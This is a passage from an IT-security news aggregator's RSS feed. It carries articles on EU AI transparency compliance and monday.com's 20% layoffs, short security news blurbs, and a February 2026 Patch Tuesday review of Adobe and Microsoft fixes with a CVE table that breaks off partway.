<p class="wp-block-paragraph">The durability concern is the most difficult, Gogia noted, because marking performs well in controlled settings but “badly in ordinary life.” Meta, for one, said its invisible watermark was designed to survive cropping; a published test, however, found the company’s preview detector missed <a href="https://www.reuters.com/business/meta-ai-image-detector-fails-identify-some-its-own-cropped-ai-images-reuters-2026-07-10/" target="_blank" rel="noreferrer noopener">55% of cropped images</a>.</p>



<p class="wp-block-paragraph">“CIOs should ask which platform can actually provide evidence before believing its dashboard,” said Gogia.</p>



<p class="wp-block-paragraph">Disclosure of AI use must be “clear, distinguishable and accessible,” he emphasized. “A notice buried in lengthy terms, or reachable only through determined clicking, satisfies nobody, least of all a market surveillance authority.”</p>



<p class="wp-block-paragraph">Sustained compliance is a “living control” requiring a central record of systems, duties and evidence; testing taking place where the user meets the control rather than where the developer built it; and continuous supplier assurance. Enforcement will vary by country, so keep one common baseline with local overlays, Gogia said.</p>



<p class="wp-block-paragraph">His advice: Inventory every system that talks to people, generates content, or gauges sentiment; classify provider and deployer roles; place disclosures at first interaction; define substantive human review; keep the evidence.</p>



<p class="wp-block-paragraph">Marks and provenance signals should be tested after content undergoes cropping, compression, translation, transcription, and other editing, Gogia said. A useful audit starts from a real output and follows its “pulse” through generation, editing and publication, identifying at “each beat” the responsible party, the surviving mark, and evidence for exceptions. Missed labels should also be traced for root cause and recurrence.</p>



<p class="wp-block-paragraph">To ensure compliance, before August 2, enterprises need a prioritized inventory, live disclosures on the highest-risk use cases, and a “named owner for every control,” he noted. In the first 30 days, they should stabilize and test; in the first 90 days, push requirements into procurement processes as a standing discipline. Procurement must secure commitments on marking methods, known failure modes, and evidence access, with explicit notice if/when any of them change.</p>



<p class="wp-block-paragraph">“The sensible architecture is a common transparency baseline carrying traceability, responsibility, and evidence, with jurisdictional overlays for language, sector rules, and local practice,” Gogia said.</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4199109/the-eus-ai-transparency-deadline-is-weeks-away-is-your-enterprise-ready.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Monday.com cuts 20% of its workforce to restructure for the AI era]]></title>
<description><![CDATA[Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.



Monday.com co-founder and co-CEO Eran Zinman tod...]]></description>
<link>https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694771/ai-nachrichten/mondaycom-cuts-20-of-its-workforce-to-restructure-for-the-ai-era/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Healthy software companies typically don’t suddenly eliminate one-fifth of their workforce, but monday.com is doing just that as it bets on flatter teams, AI agents, and customer implementation expertise as the winning combination in the AI era.</p>



<p class="wp-block-paragraph">Monday.com co-founder and co-CEO Eran Zinman <a href="https://www.linkedin.com/pulse/building-mondaycom-its-next-chapter-eran-zinman-cxx4e/" target="_blank" rel="noreferrer noopener">today announced</a> the “very difficult decision” to reduce the AI work platform company’s global workforce by about 20%, or 620 people.</p>



<p class="wp-block-paragraph">The move has nothing to do with increasing margins or replacing humans with AI, he insisted in his post on LinkedIn; rather, it’s a calculated decision to trim down and hone the company’s focus as AI becomes integral to day-to-day workflows.</p>



<p class="wp-block-paragraph">“This is not a distress signal; it is a deliberate reset, disclosed with its price attached,” said <a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research. “The industry has quietly swapped the meaning of productivity, and this filing is the clearest exhibit yet.”</p>



<h2 class="wp-block-heading">A ‘significant opportunity’ in technology</h2>



<p class="wp-block-paragraph">In a <a href="https://www.sec.gov/Archives/edgar/data/1845338/000117891326003553/zk2635715.htm" target="_blank" rel="noreferrer noopener">SEC filing</a> this week, monday.com said its restructuring plan reflects the “ongoing transformation of its product, marketing, and go-to-market strategy.” The move is intended to support a “leaner, more focused operating model” as the company continues to invest in its AI-driven strategy.</p>



<p class="wp-block-paragraph">Zinman noted in his post that the company has shifted to “doing the work with AI and not just managing it,” and is focused on building environments where “people and <a href="https://www.cio.com/article/411198/how-to-launch-your-ai-projects-from-pilot-to-production-and-ensure-success.html" target="_blank">AI agents</a> [work] together in one workspace.”</p>



<p class="wp-block-paragraph">In recent months, monday.com has <a href="https://www.computerworld.com/article/3822438/monday-com-aims-to-be-an-ai-first-platform-with-latest-enhancements.html" target="_blank">evolved its products</a>, strategy, and the way it serves its customers, and Zinman contended that “the organization we built for our previous chapter is not the organization that fits the new AI era.” Monday.com needs to “execute more decisively,” take on new challenges, and quickly respond to market changes, he said.</p>



<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[ESET Research: Sandworm behind cyberattack on Poland’s power grid in late 2025]]></title>
<description><![CDATA[The attack involved data-wiping malware that ESET researchers have now analyzed and named DynoWiper]]></description>
<link>https://tsecurity.de/de/3694655/malware-trojaner-viren/eset-research-sandworm-behind-cyberattack-on-polands-power-grid-in-late-2025/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694655/malware-trojaner-viren/eset-research-sandworm-behind-cyberattack-on-polands-power-grid-in-late-2025/</guid>
<pubDate>Sat, 25 Jul 2026 19:04:39 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The attack involved data-wiping malware that ESET researchers have now analyzed and named DynoWiper]]></content:encoded>
</item>
<item>
<title><![CDATA[Four Lincoln Laboratory technologies win five 2023 R&D 100 awards]]></title>
<description><![CDATA[Inventions in medical imaging, aircrew scheduling, data security, and quantum networking are named among the year’s most innovative new products.]]></description>
<link>https://tsecurity.de/de/3694496/it-security-nachrichten/four-lincoln-laboratory-technologies-win-five-2023-rd-100-awards/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694496/it-security-nachrichten/four-lincoln-laboratory-technologies-win-five-2023-rd-100-awards/</guid>
<pubDate>Sat, 25 Jul 2026 19:01:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Inventions in medical imaging, aircrew scheduling, data security, and quantum networking are named among the year’s most innovative new products.]]></content:encoded>
</item>
<item>
<title><![CDATA[Melissa Choi named director of MIT Lincoln Laboratory]]></title>
<description><![CDATA[With decades of experience working across the laboratory’s R&D areas, Choi brings a focus on collaboration, technical excellence, and unity.]]></description>
<link>https://tsecurity.de/de/3694490/it-security-nachrichten/melissa-choi-named-director-of-mit-lincoln-laboratory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694490/it-security-nachrichten/melissa-choi-named-director-of-mit-lincoln-laboratory/</guid>
<pubDate>Sat, 25 Jul 2026 19:01:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With decades of experience working across the laboratory’s R&amp;D areas, Choi brings a focus on collaboration, technical excellence, and unity.]]></content:encoded>
</item>
<item>
<title><![CDATA[The February 2026 Security Update Review]]></title>
<description><![CDATA[I have survived the biggest Pwn2Own ever, but I’m back in Tokyo for the second Patch Tuesday of 2026. My location never stops Patch Tuesday from coming, so let’s take a look at the latest security patches from Adobe and Microsoft.  If you’d rather watch the full video recap covering the entire re...]]></description>
<link>https://tsecurity.de/de/3694474/it-security-nachrichten/the-february-2026-security-update-review/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694474/it-security-nachrichten/the-february-2026-security-update-review/</guid>
<pubDate>Sat, 25 Jul 2026 19:00:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="">I have survived the biggest Pwn2Own ever, but I’m back in Tokyo for the second Patch Tuesday of 2026. My location never stops Patch Tuesday from coming, so let’s take a look at the latest security patches from Adobe and Microsoft.  If you’d rather watch the full video recap covering the entire release, you can check it out here:</p>





















  
  




  
















  
    
      
    
    
      
        
      
    
    
    



  






  <p class=""><strong>Adobe Patches for February 2026</strong></p><p class="">For February, Adobe released nine bulletins addressing 44 unique CVEs in Adobe Audition, After Effects, InDesign, Substance 3D Designer, Substance 3D Stager, Adobe Bridge, Substance 3D Modeler, Lightroom Classic, and the Adobe DNG Software Development Kit (SDK). The largest update here is for <a href="https://helpx.adobe.com/security/products/after_effects/apsb26-15.html">After Effects</a>, which fixes 13 Critical and two Important rated bugs. The patch for <a href="https://helpx.adobe.com/security/products/substance3d_designer/apsb26-19.html">Substance 3D Designer</a> is on the larger side with seven fixes, but only two of those are Critical. On the other hand, the fix for <a href="https://helpx.adobe.com/security/products/substance3d_stager/apsb26-20.html">Substance 3D Stager</a> corrects five Critical-rated bugs that could lead to code execution. The <a href="https://helpx.adobe.com/security/products/audition/apsb26-14.html">Audition</a> patch fixes six bugs, but only one is Critical.</p><p class="">The other patches are smaller in size. The fix for the <a href="https://helpx.adobe.com/security/products/dng-sdk/apsb26-23.html">Adobe DNG Software Development Kit (SDK)</a> corrects two Critical and two Important-rated bugs. The <a href="https://helpx.adobe.com/security/products/indesign/apsb26-17.html">InDesign</a> patch fixes three bugs, but only one is Critical. The update for <a href="https://helpx.adobe.com/security/products/bridge/apsb26-21.html">Adobe Bridge</a> fixes two Critical bug that could lead to code execution. The patch for <a href="https://helpx.adobe.com/security/products/lightroom/apsb26-06.html">Lightroom Classic</a> addresses a single Critical bug, and the release is wrapped up with a patch for <a href="https://helpx.adobe.com/security/products/substance3d-modeler/apsb26-22.html">Substance 3D Modeler</a> that fixes a single, Important-rated memory link.</p><p class="">None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release, and all of the updates released by Adobe this month are listed as deployment priority 3.</p><p class=""><strong>Microsoft Patches for February 2026</strong></p><p class="">This month, Microsoft drops 58 new CVEs in Windows and Windows components, Office and Office Components, Azure, Microsoft Edge (Chromium-based), .NET and Visual Studio, GitHub Copilot, Mailslot FS, Exchange Server, Internet Explorer (!), Power BI, Hyper-V Server, and the Windows Subsystem for Linux. Counting the third-party and Chromium updates listed in the release, it brings the total number of CVEs to 62. One of the bugs in the Windows Graphics component was submitted through the ZDI program. Five of these bugs are rated Critical, two are rated Moderate, and the rest are rated Important in severity.</p><p class="">It’s typical to see this number of CVEs released in February, but the number of bugs under active attack is extraordinarily high. Microsoft lists six bugs being exploited at the time of release, with three of these listed as publicly known. Last month only had a single bug being exploited, although there were twice as many CVEs patched. We’ll see if we’re on our way to another “hot exploit summer” as we saw a few years ago or if this is just an aberration. </p><p class="">Let’s take a closer look at some of the more interesting updates for this month, starting with the bugs under active attack: </p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510"><strong>CVE-2026-21510</strong></a><strong> - Windows Shell Security Feature Bypass Vulnerability<br></strong>This bug is listed as a security feature bypass, but it could also be classified as code execution. An attacker can bypass Windows SmartScreen and Windows Shell security prompts to execute code on a target system. This bug is also listed as publicly known, but Microsoft doesn’t say where. There is user interaction here, as the client needs to click a link or a shortcut file. Still, a one-click bug to gain code execution is a rarity. Definitely test and deploy this fix quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514"><strong>CVE-2026-21514</strong></a><strong> - Microsoft Word Security Feature Bypass Vulnerability<br></strong>This bug also requires user interaction in the form of opening a Word document, but that’s all that’s required to bypass protections to dangerous COM/OLE controls. Thankfully, the Preview Pane is <em>not</em> an attack vector here. However, users are well known to open lots of documents they receive in e-mail. This bypass could also result in code execution if the right COM/OLE control is hit. This is also listed as publicly known, so add this to the list to test and deploy quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519"><strong>CVE-2026-21519</strong></a><strong> - Desktop Window Manager Elevation of Privilege Vulnerability<br></strong>This is the second month in a row that a DWM was listed as being exploited in the wild. That leads me to believe the first patch didn’t completely resolve the vulnerability. Same as last month, this bug allows attackers to run code with SYSTEM privileges. Bugs of this type are typically paired with a code execution bug to take over a system. As always, Microsoft offers no indication of how widespread these exploits may be.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533"><strong>CVE-2026-21533</strong></a><strong> - Windows Remote Desktop Services Elevation of Privilege Vulnerability<br></strong>Don’t let the word “Remote” in the title fool you – this is a local bug that allows attackers to run code with SYSTEM privileges. It’s interesting that Microsoft lists “Improper privilege management” as the root cause for this issue. If the system is running Remote Desktop Services, it’s probably a juicy target for attackers to move laterally after an initial breach. Add this one to the list of patches to test and deploy immediately.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513"><strong>CVE-2026-21513</strong></a><strong> - Internet Explorer Security Feature Bypass Vulnerability<br></strong>Although long gone by many measurements, IE does still exist on Windows systems, and calling it always results in a vulnerability somehow. This bug manifests similarly to the Shell bug above, as it requires user interaction but could result in code execution. The bypass here is simply the ability to reach IE, which shouldn’t be possible. Again, test and deploy this fix quickly.</p><p class="">-    <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525"><strong>CVE-2026-21525</strong></a><strong> - Windows Remote Access Connection Manager Denial of Service Vulnerability<br></strong>It’s unusual to see DoS bugs being used in active attacks, but that’s what we have here. A null pointer deref in the Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally. Most null pointer derefs cause the application or service to crash, but it’s not clear if it will automatically restart. I would exercise caution and patch quickly either way.</p><p class="">Here’s the full list of CVEs released by Microsoft for February 2026:</p>





















  
  




  


  
    





<link rel="File-List" href="2026_PatchTable-Feb.fld/filelist.xml">













<table border="0" cellpadding="0" cellspacing="0" width="953">
 <col width="151" class="xl69">
 <col width="263" class="xl72">
 <col width="111" class="xl71" span="4">
 <col width="95" class="xl71">
 <tr height="48">
  <td width="151" class="xl69" height="48"><span> </span>CVE<span> </span></td>
  <td width="263" class="xl72"><span> </span>Title<span> </span></td>
  <td width="111" class="xl71"><span> </span>Severity<span> </span></td>
  <td width="111" class="xl71"><span> </span>CVSS<span> </span></td>
  <td width="111" class="xl71"><span> </span>Public</td>
  <td width="111" class="xl71"><span> </span>Exploited<span> </span></td>
  <td width="95" class="xl71"><span> </span>TYPE<span> </span></td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514"><span><span> </span>CVE-2026-21514<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Word Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510"><span><span> </span>CVE-2026-21510<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Shell Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21513"><span><span> </span>CVE-2026-21513<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Internet Explorer Security Feature Bypass
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.8</td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">SFB</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519"><span><span> </span>CVE-2026-21519<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Desktop Window Manager Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="72">
  <td class="xl74" height="72"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533"><span><span> </span>CVE-2026-21533<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Remote Desktop Services Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525"><span><span> </span>CVE-2026-21525<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Windows Remote Access Connection Manager
  Denial of Service Vulnerability<span> </span></td>
  <td class="xl68"><span> </span>Moderate<span> </span></td>
  <td class="xl65">6.2</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl66"><span> </span>Yes<span> </span></td>
  <td class="xl65">DoS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21511"><span><span> </span>CVE-2026-21511<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft Outlook Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-2804"><span><span> </span>CVE-2023-2804 *</span></a></td>
  <td width="263" class="xl75"><span> </span>Red Hat, Inc. CVE-2023-2804: Heap Based
  Overflow libjpeg-turbo<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>Yes<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24302"><span><span> </span>CVE-2026-24302<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Arc Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">8.6</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-24300"><span><span> </span>CVE-2026-24300<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Front Door Elevation of Privilege
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">9.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21532"><span><span> </span>CVE-2026-21532<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Function Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">8.2</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21522"><span><span> </span>CVE-2026-21522<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft ACI Confidential Containers
  Elevation of Privilege Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">6.7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="73">
  <td class="xl74" height="73"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-23655"><span><span> </span>CVE-2026-23655<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Microsoft ACI Confidential Containers
  Information Disclosure Vulnerability<span> </span></td>
  <td class="xl73"><span> </span>Critical<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21218"><span><span> </span>CVE-2026-21218<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>.NET and Visual Studio Spoofing
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21512"><span><span> </span>CVE-2026-21512<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure DevOps Server Cross-Site Scripting
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">XSS</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21529"><span><span> </span>CVE-2026-21529 †</span></a></td>
  <td width="263" class="xl75"><span> </span>Azure HDInsight Spoofing Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">5.7</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Spoofing</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21528"><span><span> </span>CVE-2026-21528<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure IoT Explorer Information Disclosure
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">6.5</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">Info</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21228"><span><span> </span>CVE-2026-21228<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure Local Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">8.1</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21531"><span><span> </span>CVE-2026-21531<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Azure SDK for Python Remote Code Execution
  Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">9.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">RCE</td>
 </tr>
 <tr height="48">
  <td class="xl74" height="48"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21251"><span><span> </span>CVE-2026-21251<span> </span></span></a></td>
  <td width="263" class="xl75"><span> </span>Cluster Client Failover (CCF) Elevation of
  Privilege Vulnerability<span> </span></td>
  <td class="xl70"><span> </span>Important<span> </span></td>
  <td class="xl65">7.8</td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65"><span> </span>No<span> </span></td>
  <td class="xl65">EoP</td>
 </tr>
 <tr height="48">
